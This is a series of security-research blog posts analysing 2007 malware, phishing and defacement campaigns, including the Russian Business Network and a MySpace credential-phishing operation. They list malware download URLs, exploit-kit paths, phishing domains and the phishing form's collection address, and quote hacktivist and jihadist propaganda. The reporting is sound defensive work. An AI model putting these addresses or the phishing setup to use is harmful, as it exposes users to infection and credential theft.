A TrustedSource for Threats Intell Data

Following the series of posts on early warning security events systems, Secure Computing have just announced a major upgrade of their threat intell service :

"Secure Computing's TrustedSource acts like a satellite advanced-warning system for the Internet that detects suspicious behavior patterns at their origins, and then instructs security devices to take corrective precautions or action," said Dr. Phyllis Schneck, vice president of research integration for Secure Computing. "TrustedSource pinpoints reputation by looking at behavior and specific factors such as traffic volumes, patterns and trends, and enabling it to rapidly identify deviations from the norm on a minute-by-minute basis."

I've already mentioned the radical perspective of integrating all the publicly known IPs with bad reputation, and sort of ignoring their online activities in order to prevent common problems such as click fraud for instance. Think from the end user's perspective, what's the worst thing that could happen to both the average and experienced end user? Try witnessing the situation when a known to be infected with malware end user starts receiving messages like these, and will continue to receive them until a certain action is taken presumably disinfecting themselves. Of course, it's more complex than it sounds, but start from the basics in terms of the incentives for end users to disinfect themselves, the masses of which aren't that very socially oriented unless of course it's global warming and the possibility for a white Christmas you're talking about. Issuing an "Internet Driver's License" wouldn't work on an international scale, and even if it works on a local scale somewhere in the world, it wouldn't really matter, since you'll have the rest of the world driving unsafely, and you'll be the only country which has fastened its seat belt. Here's an example of such mode of thinking.

Continue reading →

Are You Botnet-ing With Me?

Informative and recently released study by ENISA on the problem of botnets, especially the emphasis on how client side vulnerabilities surpassed email attachments, and downloading of infected files as infection vectors. Not because these aren't working, but because of the botnet's masters attitude for achieving malicious economies of scale has changed. Despite that we can question whether or not they put so much efforts while strategizing this, let's say they stopped pushing malware, and started coming up with ways for the end users to pull it for themselves :

"The most common infection methods are browser exploits (65%), email attachments (13%,) operating system exploits (11%), and downloaded Internet files (9%). Currently, the most dangerous infection method is surfing to an infected webpage. Indications of a bot on your computer include e.g.: Slow Internet connection, strange browser behavior (home page change, new windows, unknown plug-ins), disabled anti-virus software; unknown autostart programs etc."

Here's the entire publication - "Botnets - The Silent Threat" by David Barroso. Continue reading →

I See Alive IFRAMEs Everywhere - Part Two

The never ending IFRAME-ing of relatively popular or niche domains whose popularity is attracting loyal and well segmented audience, never ends. Which leads us to part two of this series uncovering such domains and tracing back the malicious campaign to the very end of it. Some of these are still IFRAME-ed, others cleaned the IFRAMEs despite Google's warning indicating they're still harmful, the point is that all of these are connected.

Affected sites :

Epilepsie France - epilepsie-france.org
Iran Art News - iranartnews.com
The Media Women Forum - yfmf.org
Le Bowling en France - bowling-france.fr
The Hong Kong Physiotherapists Union - hkpu.org
The Wireless LAN Community - wlan.org
The First HELLENIC Linux Distribution - zeuslinux.gr

The entire campaign is orbiting around pornopervoi.com, which was last responding to 81.177.3.225, an IP that's also known to be hosting a fake bank (weiterweg-intl.com) according to Artists Against 419. Within the domain, there were small files loading a second IFRAME. For instance, pornopervoi.com/u.php leads to 88.255.94.246/freehost1/georg/index.php?id=0290 (WebAttacker), the same campaign is also active at 81.29.241.238/freehost1/georg/index.php?id=0290, these try to drop the following :

88.255.94.246/freehost1/chris0039/lu/dm_0039.exe
81.29.241.238/freehost1/chris0031/lu/dm_0031.exe

An Apophis C&C panel was located in this ecosystem as well. Among the other files at pornopervoi.com, are pornopervoi.com/i.php where we're redirected to the second one spelredeadread.com/in.php?adv=678. Even more interesting, energy.org.ru a Web hosting provider is also embedded with pornopervoi.com/m.php again forwarding to spelredeadread.com. To further expand this ecosystem, yfmf.org the Media Women Forum is also IFRAME-ed with a link pointing to pornopervoi.com/m.php. Another site that's also pointing to pornopervoi.com/m.php is the Hong Kong Physiotherapists Union hkpu.org. Two more sites serving malware, namely wlan.org, the Wireless LAN Community also pointing to pornopervoi.com/m.php, and zeuslinux.gr, The First HELLENIC Linux Distribution.

Who's behind this malware embedded attack? It's the ongoing consolidation between defacers, malware authors, and blackhat SEO-ers using the infamous infrastructure of the RBN.

Related posts:
Bank of India Serving Malware
U.S Consulate in St.Petersburg Serving Malware
Syrian Embassy in London Serving Malware
CISRT Serving Malware
Compromised Sites Serving Malware and Spam
A Portfolio of Malware Embedded Magazines
Possibility Media's Malware Fiasco
The "New Media" Malware Gang
Another Massive Embedded Malware Attack Continue reading →

But Malware is Prone to be Profitable

Read this a couple of times, than read it several more times, and repeat. It's usually "powerful stuff" that prompts such confusing descriptions of what sound like defense in-depth at one point, and a combination of intergalactic security statements in respect to the "massive amounts of computing power required" to solve the "security problem" at another. Stop predicting weather and assessing the impact of global warming, and command the supercomputers to figure our the scientific mysteries behind common insecurities :

"Even if we can't produce effective network security, we can at least make it more difficult and therefore expensive to attack a network by adopting some of the hacker's own techniques. He favors randomizing the use of a number of techniques for filtering content, so that individual malware vectors will sporadically stop working. By changing the challenge involved in compromising systems, the whole malware economy is changed. Stolfo also took a positively Darwinian view of how much change was needed, suggesting that security only had to be good enough to make someone else's system look like a more economical target. Overall, the talks were pretty depressing, given that the operating systems and software we rely on will probably never be truly secure. The process of blocking malware that takes advantage of this insecurity appears to be entering the realm where true security has become one of those problems that requires massive amounts of computing power and an inordinate amount of time."

The operating systems and the software we use can be truly secure, but will be useless compared to the currently insecure, but useful ones we're using. Now here's a great and straight to the point article, that's segmenting the possible uses of a host that's already been compromised, a great example of how innovations in terms of improved Internet connectivity, increased CPU power, and flexibility of online payments both steamline progress, and contribute to the growth of the underground.

Beat malware by doing what malware authors do? Sounds great. Malware authors outsource, do it too. Malware authors embraced the on demand SCM concept, embrace it too. Malware authors consolidate with stronger strategic partners, and acquire the weaker ones by providing them with DIY malware creation tools in order for them to make the headlines at a later stage, consolidate too. Malware authors keep it simple the stupids, you fight back with rocket science theoretical models and shift the focus from the pragmatic reality just the way it is - consolidation, outsourcing, shift towards a service based economy, quality and assurance of the malware releases, malicious economies of scale in the form of malware exploitating kits, ones it's getting hard to keep track of these days.

At the bottom line, how to solve the "malware problem"? It all depends on who you're solving it for. Long live marginal thinking.

Related posts:
Malware - Future Trends, January, 2006
Underground Economy's Supply of Goods and Services
The Dynamics of the Malware Industry - Proprietary Malware Tools
Managed Spamming Appliance - The Future of Spam
Multiple Firewalls Bypassing Verification on Demand Continue reading →

Exposing the Russian Business Network

It was about time someone comes up with an in-depth study summarizing all of the Russian Business Network's activities, as for me personally, 2007 is the year when bloggers demonstrated what wisdom of the crowds really means, by putting each and every piece of the puzzle to come up with the complete picture, one the whole world benefits from. A highly recommened account into the RBN's activities courtesy of David Bizeul's "Russian Business Network study" :

"It’s interesting to observe that many recent cyber crime troubles are relating to Russia. This observation is obviously a simple shortening. Indeed nothing seems to link to Russia at first sight, it’s a nasty country for sending spam but many are worst, Russia is only the 8th top spam country. We need to dig deeper to identify that cyber crime is originating mostly from Russian dark zones. In a digital world, those dark zones exist where the Internet becomes invisible and it’s used for collecting phishing sites credentials, for distributing drive by download exploits, for collecting malware stolen data, etc. It’s a considerable black market as it has been revealed in this paper. A lot of information can be available over the web on Russian malicious activities and precisely on the way RBN (Russian Business Network) plays a major role in these cases."

What contributed to such a well coordinated exposure of the RBN during the last two quarters at the bottom line? It's not just security researchers exchanging info behind the curtains, but mostly due to RBN's customers confidence in RBN's ability to remain online. And while remaining online has never been a problem for the RBN, until recently when DIY IP blocking rulesets were available for the world to use, they undermined their abilities to remain undetected. In fact, I was about start a contest asking anyone who can come up with a IP with a clean reputation within the RBN's main netblock right before it dissapeared, and would have been suprised if someone managed to find one.

The RBN doesn't just makes mistakes when its customers embedd malware hosting and live exploit URLs on each and every malware and high-profile attack during the year, it simply doesn't care in covering its tracks and so doesn't their customers as well. RBN's second biggest mistake for receiving so much attention is their laziness which comes in the form of over 100 pieces of malware hosted on a single IP, without actually bothering to take care of their directory listing permissions, allowing my neatly crafred OSINT gathering techniques to come up with yet proof of a common belief into their practice of laziness. Moreover, the KISS strategy that I often relate to the successful malicious economies of scale that malware authors achieve due to DIY malware kits using outdated exploits compared to bothering to purchase zero day ones, didn't work for the RBN. Remember that each and every of the several Storm Worm related IPs that I covered once were returning fake suspended account notices in a typical KISS strategy, while the live exploit URLs and the actual binaries were still active within the domains.

This isn't exactly what you would expect from what's turning into a case study on conversational marketing, or perhaps how conversational marketing provokes the wisdom of crowds effect to materialize, so that the entire community benefits from each and everyone's contribution - in this case exposing the RBN.

How would the RBN change its practices in the upcoming future given all the publicity it received as of recently? They will simply stop benefing from the easy of management of their old centralized infrastructure, and will segment the network into smaller pieces, but while still providing services to their old customers, they're easy to traceback, and to sum up this post in one sentence - the Russian Business Network is alive, and is providing the same services to the same customers, including malware and live exploits hosting URLs under several different netblocks.

It's also great to note that David's been keeping track of my research into the RBN's activities. Go through the study and find out more about the RBN practices.

Related posts:
Go to Sleep, Go to Sleep my Little RBN
Detecting and Blocking the Russian Business Network
RBN's Fake Security Software
Over 100 Malwares Hosted on a Single RBN IP
The Russian Business Network Continue reading →

The State of Typosquatting - 2007

The recently released "What’s In A Name: The State of Typo-Squatting 2007" is a very in-depth and well segmented study into the topic, you should consider going through :

Introduction
Typo- and Cyber-squatting on the rise
Key Findings
Methodology
Rankings by Category
Sample site: McAfee.com
The Economics of Typo-Squatting: Why it Works
What is driving the increase in typo-squatting
The decline in adult content on typo-squatters
Discussion of our methodology
Defining Typo-Squatting
Other Methods for Combating Typo-Squatting
Conclusions
Complete Results

Is it just me using bookmarks and only risking to fall victim into a pharming attack, compared to manually typing and mistyping an URL? My point is that coming across several articles emphasizing how important typing the right URLs is, I think they've missed an important point which is that typosquatting by itself isn't that big of a security threat, but in a combination of tactics it becomes such. There's no chance you will ever mistype an URL such as paypal-comlwebscrc-login-run.com, a typosquatted domain like the ones I covered in September, since these ones come in as phishing emails hosting a Rock Phish kit, namely they turn into threats when combined with other tactics. Blackhat SEO is another such tactic. The type of buy-cheap-iphones.com always aim to trick search engines into positioning them among the first 20 results, and they often succeed until a search engine figures out it's a blackhat SEO spam and removes it from the index.

Here's an example of such combination of tactics, use-iphone.com for instance was spammed according McAfee, the folks behind the study. What's was use-iphone.com all about? Icepack kit in action - use-iphone.com/ice-pack/index.php. Continue reading →

A Botnet of Infected Terrorists?

Redefining malware to minimize the negative public outbreak by renaming it to Remote Forensic Software, now that's a evil marketing department's positioning strategy in action. I've already discussed how inpractical the utopian central planning of a security industry is, and while you're limiting the access to the tools who may help someone unethically pen testing an internal asset, you're also limiting the possibility for the discovery of such vulnerable asset - basically a false feeling of security, you don't touch it, it doesn't move, until of course someone else outside your controlled environment comes across it, the way they will sooner or later since it's an open network, one you benefit from, but cannot fully control.

Australian law enforcement have been using spyware for a while, and Austria following Germany's interest into the concept is getting involved too:

"Germany is hiring software specialists to design "white-hat" viruses that could infiltrate terrorists' computers and help police detect upcoming attacks, an Interior Ministry spokeswoman in Berlin confirmed Saturday. The government is still drafting legislation to permit snooping via the internet under judicial control, but has decided there is no time to lose in developing the "remote forensic software." The ministry said the BKA federal police had been instructed to resume the development and hire two specialists."

Are cyber criminals or bureaucrats the industry's top performer? In November, 2008, we'll be discussing how come so much money were spend to develop the malware, given the lack of any ROI out of this idea during the entire period, whereas DIY malware tools are not just a commodity, but also freely available for a law enforcement to use. Moreover, emailing malware is so old-fashioned and noise generating, that even the average Internet users knows "not to click on those email attachments sent from unknown source". A far more pragmatic approach would be to embedd the malware on sites suspected of evangelizing terrorism, or radicalizing their audiences, by doing so you'll end up with a larger infected sample, and eventually someone, let's say 1 out of 10,000 infected will turn out to be a terrorist, by whatever definition you're referring to in the case. Even more pragmatic, by requesting a botnet on demand, and requiring the botnet master to tailor your purchase by providing you with infected hosts in Germany whose browser language, and default fonts used are Arabic, you will not just save money, but will increase the probability of coming across a stereotyped terrorist, by outsourcing the infecting stage to those who excell at it.

Excluding the sarcasm, it's your money that go for funding of such initiatives who basically "shoot into the dark" to see if they can hit someone. Even if they manage to infect someone, more staff will be required to monitor the collected data, which means more money will go into this, ending up with an entire department monitoring wishful thinking and thought crime. Geheime Staatspolizei anyone?

If you really want access to real-time early warning threat intell for possible threats, monitor the public cyber jihadist communities don't come up with new ones to use them as honeypots for cyber jihadists, identify local residents, evaluate their state of radicalization and attitudes towards standard terrorist ideas, prioritize, and take action if necessary.

Cartoon courtesy of Mahjjob.com Continue reading →

Mass Defacement by Turkish Hacktivists

At first it appeared that it was just the official site of Goa's DoIP, that's been defaced by Turkish defacers, but looking further the campaign gets much bigger than originally anticipated :

"The official website of the Goa government’s Department of Information and Publicity (DoIP) - goainformation.org - was hacked by a group of Turkish militants on Saturday. The hacker has not only defaced the website, replacing all information with the group’s propaganda material in Turkish language, but also posted some gory pictures of slain terrorists. The DoIP has now lodged a complaint with the Panjim Police and the Panjim crime branch is investigating the matter."

The campaign is aiming to send a PSYOPS signal to the rest of the world regarding the recent tensions between Turkey's military operations in northern Iraq against PKK, an action the U.S doesn't seem to enjoy at all. Some sample defaced sites are savymedia.com; itrit.com; sledderforever.com; pssoc.org; youthblood.org; prisonministry.com. The defacers are sending the following message :

"The United States of America who is feeding on and strengthening behind closed doors the universal terrorists, is the greatest terrorist country. pkk/kadek/hpg/kkk is the world's most bloody and brutal terrorism group. They killed approximately 35.000 innocent people without any cruel till now. All the nations and states must know which are supporting these bloody and brutal terrorism groups, supporting terrorism will brings suffer and deathness. We are always be a side of peace. but we have always some words to say these terrorists "which" wants to seperate us and kill innocent people"

Moreover, Turkish hacktivists from another group have also been active recently by defacing the Assyrian Academic Society, Assyrian actress and author Rosie Malek-Yonan's site, and International Campaign to Support the Christians of Iraq petition's site. Three other Turkish hacktivists are also currently defacing under the handles of NusreT, MUSTAFAGAZI, and Storm, using the same defacement templates. The first group is reachable at a closed forum turkmilliyetcileri.org, and the second at turkittifak.org. Apparently, these groups are all under the umbrella of the Turkish Republican Hackers group. Continue reading →

Large Scale MySpace Phishing Attack

In need of a "creative phishing campaign of the year"? Try this, perhaps the largest phishing attack spoofing MySpace and collecting all the login details at a central location, that's been active for over a month and continues to be. A Chinese phishing group have come up with legitimate looking MySpace profiles (profile.myspace.com) in the form of subdomains at their original .cn domains, and by doing so achieve its ultimate objective - establish trust through typosquatting, remain beneath the security vendors radar by comment spamming the URLs inside MySpace, and obtain the login details of everyone who got tricked.

Key points :

- all of the participating domains are using identical DNS servers, whereas their DNS records are set to change every 3 minutes

- each and every domain is using a different comment spam message, making it easy to assess the potential impact of each of them

- the URLs are not spammed like typical phishing emails, but comment spammed within MySpace by using legitimate accouts, presumably once that have already fallen victim into the campaign, and mostly to remain beneath the radar of security vendors if the URLs were spammed in the usual manner

- all of the URLs are the subdomains are currently active, and the login details get forwarded to a central location 319303.cn/login.php

This how the fake MySpace login looks like on the fake domains/subdomains :

(form action = "http://319303.cn/login.php" method = "post" name = "theForm" id = "theForm)

This is how the real MySpace login looks like :

(form action = "http://secure.myspace.com/index.cfm?fuseaction=login.process" method = "post" id = "LoginForm")

Sample MySpace phishing URLs from this campaign :

profile.myspace.com.fuseaction.id.0ed37i8xdd.378d38.cn

profile.myspace.com.index.fuseaction.id.370913.cn

profile.myspace.com.fuseaction.id.0ed37i8xdd.125723.cn

profile.myspace.com.fuseaction.id.Dx78x00iJe5.982728.cn

profile.myspace.com.fuseaction.user.id.28902334.arutncbt.cn

profile.myspace.com.fuseaction.id.0nd8di8xfd.125723.cn

profile.myspace.com.fuseaction.id.0ed37i8xdd.109820.cn

Ten sample Chinese domains participating in the phishing attack, returning the MySpace spoof at the main index and the subdomains :

378d38.cn

978bg33.cn

370913.cn

107882.cn

103238.cn

978nd03.cn

107882.cn

pcc2ekxz.cn

125723.cn

pckeez.cn

Assessing the comment messages used on ten phishing domains for internal comment spamming at MySpace :

370913.cn - "haha i cant believe we went to high school with this girl"

978bg33.cn - "sometimes i cannot believe the pics people put on their myspaces"

982728.cn - "I cannot believe this freaking whore would put pics like that on her myspace page.. how trashy.."

977y62.cn - "did you see what happened? OMG you gotta see Mike's profile."

125723.cn - "did you see what happened? OMG you gotta see Mike's profile."

pckeez.cn - "can you believe we went to highschool with this chick?"

pcc2ekxz.cn - "can't believe a 18 year old chick would put half-nude pics on myspace. whore alert."

arutncbt.cn - "wow her brother is gonna be so pissed when he sees the pictures she put on her myspace"

125723.cn - "Did you hear what happened Omg you gotta see the profile.. So sad!"

109820.cn - "sometimes i just cannot believe the pics that people put on their myspaces LMAO!"

The campaign is surprisingly well thought of. If they were spamming the phishing URLs, security vendors would have picked it up immediately and its lifetime would have been much shorter compared to its current one. The phishers aren't sending emails asking people to login to MySpace via profile.myspace.com.random_digits.cn for instance, instead they're spamming inside MySpace by posting comments prompting users to click further using the phrase "haha i cant believe we went to high school with this girl". It gets even more interesting, compared to the common logic of them having to register fake accounts and posting the comments by using them, in this case, the three sample comments posted on Nov 2 2007 11:22 AM; Nov 4 2007 1:02 PM ; Nov 5 2007 8:47 AM; Nov 5 2007 9:33 PM, are all posted by legitime users, well from legitimate users' accounts in this case. How huge is this? Over 378,000 results for the campaign under this phrase keeping in mind that people embed their MySpace profiles at their domains, and 128,000 instances of a sample phishing domain (370913.cn) at MySpace.com itself. This is for one of the phishing domains only.

Now if that's not enough to disturb you, each and every of the .cn domains are resolving to what looks like U.S based hosts only that will change every 3 minutes. Not necessarily as dynamic as previously discussed fast-flux networks, but these are worth keeping an eye on :

107882.cn

370913.cn

978bg33.cn

Here are some central DNS servers that all the .cn domains use :

ns4.6309a46.com

ns1.52352a0c60a9c29.com

ns3.926817a885d86e1.com

ns2.terimadisirida.net

I'll leave the data mining based on these patterns to you, what's important is that the URLs are still serving spoofed MySpace front pages, with the only downsize that they cannot sucessfully load MySpace's videos, and don't provide any SSL authentication, which I doubt have prevented lots of people from falling victims into it.

Does all the data lead us to conclude that this could be the most "creative phishing campaign of the year"? Let's have it offline first. Continue reading →

The "New Media" Malware Gang

Since Possibility Media's Malware Fiasco, I've been successfully tracking the group behind the malware embedded attack at each and every online publication of Possibility Media. Successfully tracking mostly because of their lack of interest in putting any kind of effort of making them harder to trace back, namely, maintaining a static web presence, but one with diversifying set of malware and exploits used. Possibility Media's main IFRAME used was 208.72.168.176/e-Sr1pt2210/index.php, and at 208.72.168.176 we have a great deal of parked domains in standby mode such as :

repairhddtech.com
granddslp.net
prevedltd.net
stepling.net
softoneveryday.com
samsntafox.com
himpax.com
grimpex.org
trakror.org
dpsmob.com
besotrix.net
gotizon.net
besttanya.com
carsent.com
heliosab.info
gipperlox.info
leader-invest.net
fiderfox.info
potec.net

However, the latest IPs and domains related to the group are dispersed on different netblocks and are actively serving malware through exploit URLs :

78.109.16.242/us3/index.php
x-victory.ru/forum/index.php (85.255.114.170)
asechka.cn/traff/out.php (78.109.18.154)
trafika.info/stools/index.php (203.223.159.92)

What's so special about this group? It's the connection with the Russian Business Network. As I've already pointed out, the malware attack behind Possibility Media's was using IPs rented on behalf of RBN customers from their old netblock, here are two such examples of RBN IPs used by this group as well :

81.95.149.236/us3/index.php
81.95.148.162/e202/

In case you also remember, some of this group's URLs were also used as communication vehicle with a downloader that was hosted on a RBN IP, that very same RBN IP that was behind Bank of India's main IFRAME. Now that's a mutually beneficial malicious ecosystem for both sides. Here are more comments on other ecosystems. Continue reading →

But of Course I'm Infected With Spyware

Remember those old school fake hard drive erasers where a status bar that's basically doing a directory listing is shown, and HDD activity is stimulated so that the end user gets the false feeling of witnessing the process? Fake anti spyware and anti virus software, like the ones courtesy of the now fast-moving RBN, have been using this tactic for a while, and adding an additional layer of social engineering tricks by obtaining the PCs details with simple javascript. The folks behind online-scan.com; spyware.online-scan.com; antivirus.online-scan.com own a far more deceptive domain name compared to RBN's ones. In fact, even an anti virus vendor could envy them for not picking it up earlier and integrating it in upcoming marketing campaign or service to come. SpywareSoftStop's statements :

"At present the Internet is stuffed with viruses of any kind. Every PC is at risk and most probably IS infected. Anti-viruses can detect viruses only, but spyware, installed surreptitiously on a PC without the user's informed consent, is modified each day and solely particularized software can help to detect and remove it. However, a spyware program is rarely alone on a computer: an affected machine can rapidly be infected by many other components. In some infections, the spyware is not even evident; moreover, some types of spyware disable software firewalls and anti-virus software, and/or reduce browser security settings, thus opening the system to further opportunistic infections, much like an immune deficiency disease. Right now your system is going to be scanned and spyware, if any, will be detected."

The name servers preved.spywaresoftstop-support.com and medved.spywaresoftstop-support.com serve : spywaresoftstop.com; spywaresoftstop-cash.com; spywaresoftstop-support.com. The popup at online-scan.com that's now returning a 404 error for ldr.exe (downloadfilesldr.com/download/2/ldr.exe) will even appear if you try to close the window while your PC is "being scanned". What's ldr.exe? It's the default output of a DIY malware courtesy of Pinch.

Continue reading →

Lonely Polina's Secret

Just as I've been monitoring lots of spam that's using Geocities redirectors, yesterday Nicholas posted some details on a malware campaign using Geocities pages as redirectors, and Roderick Ordonez acknowledged the same. Original Geocities URLs used : geocities.com/MediciChavez7861 (active) ; geocities.com/IliseNkrumah2 (down) ; geocities.com/GounodNanon5 (down). Original message of the spam campaign :

"Hallo! Meine Name ist Polina. Ich bin Studentin und Ich habe zur Germany zu lernen angekommen . Ich suche mich den Freund und der Sex-Partner. Aller dass Ich will es ist ein guter Mann. Sie sollen ernst, sicher, klug sein. Geben Sie mich zu wissen wenn Sie wollen mit mir treffen. Ebenso konnen Sie einfach mein Freund sein. Sie konnen meine Fotos auf meiner Seite sehen: geocities.com/MediciChavez7861 BITTE, NURR DIE ERNSTE Vorschlages. KUSSE, POLINA"

The fake lonely German student Polina was also accessible from other URLs as well - ThePagesBargain.ru/polina; dibopservice.com, both now down as well as the main 58.65.238.36/polina URL which is forwarding to baby.com in an attempt to cover up the campaign -- you wish. Internal pages within the IP are still accessible - 58.65.238.36/index2_files/index3.htm; 58.65.238.36/index2_files/index.htm, and so is the malware itself - 58.65.238.36/iPIX-install.exe.

Malware campaigners are not just setting objectives and achieving them, they're also evaluating the results and drawing conclusions on how to improve the next campaign. Back in January, 2006, I emphasized on the emerging trend of localization in respect to malware, take for instance the release of a trojan in an open source form so that hacking groups from different countries could localize it by translating to their native language and making it even more easy to use, as well as the localization of MPack and IcePack malware kits to Chinese. In this campaign, a localized URL was also available targeting Dutch speaking visitors 58.65.238.36/polinanl, so you you have a German and Dutch languages included, and as we've seen the ongoing consolidation of malware authors and spammers serves well to both sides, spammers will on one hand segment all the German and Dutch emails, and the malware authors will mass mail using localized message templates. Great social engineering abusing a common stereotype that for instance German users were definitely flooded with English messages courtesy of Storm Worm targeting U.S citizens, which is like a Chinese user who's receiving a phishing email from the Royal Bank of Scotland - it's obvious both of these are easy to detect. Which is what localization is all about, the malware and spam speaks your local language. One downsize of this campaign is that Polina doesn't really look like a lonely German student, in fact she's a model and these are some of her portfolio shots.

Let's discuss how are the malware campaigners coming up with these Geocities accounts at the first place. Are the people behind the campaign manually registering them, outsourcing the registration process to someone else, or directly breaking the CAPTCHA? Could be even worse - they may be buying the already registered Geocities accounts from another group that's specializes in registering these, a group which like a previously covered concept of Proprietary Malware Tools is earning revenues based on higher profit margins given they don't distribute the product, but provide the service thereby keeping the automatic registration process know-how to themselves. Once the authentication details are known, the process of anything starting from blackhat SEO, direct spamming, malware hosting, and embedding such scripts, even IFRAMEs in a fully automated fashion.

Meanwhile, what are the chances there's another scammy ecosystem on the same netblock? But of course. vaichoau.com fake watches, pimpmovie.net malware C&C, urolicali.com.cn spammers, westernunion.reg-login.com a phishing url. Continue reading →

First Person Shooter Anti-Malware Game

Just when you think you've seen everything "evil marketers" can come up to both, consciously and subconsciously influence your purchasing behaviour and improve the favorability scale towards a company - you can still get surprised. After a decent example of the DIY marketing concept, Microsoft's perception of security as a "threat from outer space", an example of rebranding a security vendor, the Invible Burglar game, here comes another good example of new media marketering practice - while some companies seek to embed their logos into popular games, others are coming up with ones on their own. Symantec's Endpoint Protection Game - a first person shooter where the typically mutated creatures are replaces with viruses, spyware and rootkits is what I'm blogging about :

"Your task is to simply save your global network from viruses, worms, and a hideous host of online threats that are poised to take your IT infrastructure down."

Eye catching trailer as well. Such marketing campaigns can have a huge educational potential if they're, for instance, customized for a specific security awareness program module.

Continue reading →

Cyber Jihadist Blogs Switching Locations Again

Having had their blogs removed from Wordpress in a coordinated shutdown operation courtesy of the wisdom of the anti cyber jihadist crowd, The Ignored Puzzle Pieces of Knowledge and The Caravan of Martyrs have switched location to these URLs - inshallahshaheed.muslimpad.com; inshallahshaheed.acbox.com; caravanofmartyrs.muslimpad.com; ignoredknowledge.blogspot.com. Apparently there's an ongoing migration of cyber jihadist blogs from Wordpress to Muslimpads presumably with the idea to increase the time from a TOS abuse letter to shut down, if shut down ever occures given Muslimpad is significantly biased in removing such positioned as "free speech" communities given it's hosting provider is islamicnetwork.com. Should such propaganda be tolerated? This is where the different mandates of anti cyber jihadist organizations across the world contradict with each other. Some have a mandate to shut down such blogs and sites as soon as they come across such, others have a mandate to monitor and analyze these to keep in pace with emerging threats in the form of real-time intelligence, and in the near future other participants will have a mandate to infect such communities with malware ultimately targeting the cyber jihadists behind them or the visitors themselves.

The bottom line - the propaganda in the form of step-by-step video of an attack in question is a direct violation of their operational security (OPSEC) thereby providing the world's intelligence community with raw data on their warfare tactics. The propaganda's trade off is similar to that of the Dark Cyber Jihadist Web, while you may want to reach as many future recruits and "converts" as possible, you increase the chance of an intelligence analyst coming across your community, compared to closing it down to sorted and trustworthy individuals and therefore limiting the number of potential future jihadists. Inshallahshaheed are however, going for mass marketing with full speed, and in fact maintain a modest repository of videos at inshallahshaheed.vodpod.com. By the way, what's the difference between wishful thinking and thought crime? It's a threat that proves there's a positive ROI of your actions.

Related posts :
GIMF Switching Blogs
GIMF Now Permanently Shut Down
GIMF - "We Will Remain" Continue reading →

Popular Spammers Strategies and Tactics

It's been a while since I last participated with an article for WindowSecurity.com, so here it goes - Popular Spammers Strategies and Tactics :

"During 2007, spammers on a worldwide basis demonstrated their adaptability to the ongoing efforts anti-spam vendors put into ensuring their customers enjoy the benefits of having a spam-free inbox. What strategies do spammers use in order to achieve this? What tactics do they use in order to obtain email addresses, verify their validity, ensure they reach the highest number of receipts as possible in the shortest time span achievable, while making sure their spam campaigns remain virtually impossible to shut down?"

The article covers strategies and tactics such as : Redirectors/doorway pages; Rapid tactical warfare; Verification/confirmation of delivery; Consolidation; Outsourcing; and Affiliation based models. Continue reading →

Electronic Jihad's Targets List

Despite the fact that the Electronic Jihad 3.0 campaign was a futile attempt right from the very beginning, given the domains that were supposed to synchronize the targets to be attacked were down, it's interesting to try finding out who were they targeting at the first place? In the first campaigns, the URLs of the targets, not the victims since they couldn't scale enough to cause even partial damage, were obtainable via the web, compared to the third one where they were about to get synchronized. And since the synchronization URLs were down before we could take a peek, here are the targets URLs from the first two campaigns.

First campaign's targets list :
gov.il
keshmesh.net
meca-love4all.com
love4all.us

Second campaign's targets list :
love4all.us
islameyat.com
aldalil-walborhan.com
rapsaweyat.com
investigateislam.com
meca-me.org
ladeeni.net
meca-love4all.com

The attached table is the classificaton of the attacks, as site to be attacked, reason for the attack, importance, the results, and the site's status after tha attack, namely is it up and running or shut down completely, and how shutting it down would please God.

There's a saying that a person is judged by the type of enemies he has. If we apply it in this situation, you would see a bunch of inspired wannabe cyber jihadists whose biggest enemy is their idiocity at the first place. So, if these are the cyber jihadist enemies of yours - lucky you, and your critical infrastructure's integrity. Continue reading →

Scammy Ecosystem

In this example of a scammy ecosystem, you have a single IP (88.255.90.50) hosting the now, retro WebAttacker exploitation kit (inn2coming.com/income/index.php), a viagra scam (pctabletshop.hk) on the second parked domain, and an investment banking scams on another two - progold-inv.biz; cfinancialservice.com. Now, all they're missing is a Rock Phish kit hosted on it and it would have made it an even more interesting operation to monitor. Of course putting more personal efforsts into everything pays off. The same netblock is also hosting such popular downloader's update locations and live exploit URLs such as stat1count.net; all1count.net; and the recently appeared on the radar mediacount.net (88.255.90.253). Continue reading →

Teaching Cyber Jihadists How to Hack

Yet another indication of the emerging trend of building a knowledge-driven cyber jihadist community, are such online archives with localized to Arabic standard security and hacking research papers, ones you definitely came across to before, or may have in fact written by yourself. As I've already discussed this trend in previous posts, it's a PSYOPS strategy in action, one that's aiming to improve the overall perception of cyber jihadists' ability to wage their battles without using software and web services of their enemies. Whether the investment in time and resources is worth it is another topic, what's worth pointing out are the efforts they put into localizing the content in between adding the standard propaganda layer, and later on, building a community around it. Continue reading →

p0rn.gov - The Ongoing Blackhat SEO Operation

Want pr0n? Try .gov domains in general, ones that have been getting the attention of blackhat SEO-ers for a while, just like the most recent related cases where the City of Chetek, Winsonsin, the City of Somerset, Texas and Town of Norwood, Massachusetts got their blackhat SEO injection. The previous attack is related to the one I'll assess in this post, the blackhat SEO tool is the same given the static subdomains generated, what remains to be answered is how they've managed to get access to the control panels of the domains in order to add the subdomains? Let's look at the facts :

- the targets in this attack are The Virgin Islands Housing Finance Authority (VIHFA), and the City Of Selma, Alabama

- this is the second blackhat SEO operation uncovered during the past couple of months targeting .gov domains

- access to the control panels is somehow obtained so that subdomains pointing to 89.28.13.207 (89-28-13-207.starnet.md) and 89.28.13.195 (89-28-13-195.starnet.md) are added at both domains

- both .gov domains that are targets in this attack are using a shared hosting provider, meaning their IP reputation is in the hands of everyone else's web activities responding under the same IP

- no malware is served in this incident, compared to the previous one, a combination of malware and blackhat SEO

Subdomains at City of Selma currently hosting around 9000 blackhat SEO pages :

m21.selma-al.gov

m22.selma-al.gov

m23.selma-al.gov

m24.selma-al.gov

m25.selma-al.gov

m26.selma-al.gov

m27.selma-al.gov

m28.selma-al.gov

m29.selma-al.gov

m30.selma-al.gov

m31.selma-al.gov

m32.selma-al.gov

m33.selma-al.gov

m34.selma-al.gov

Subdomains at the Virgin Islands Housing Finance Authority with constantly changing structure :

a1.a.vihfa.gov

a2.a.vihfa.gov

a3.a.vihfa.gov

a4.a.vihfa.gov

a5.a.vihfa.gov

a6.a.vihfa.gov

a7.a.vihfa.gov

a8.a.vihfa.gov

a9.a.vihfa.gov

a10.a.vihfa.gov

Related subdomains now no longer responding :

2k110.x.vihfa.gov

2k106.x.vihfa.gov

j11.y.vihfa.gov

j9.y.vihfa.gov
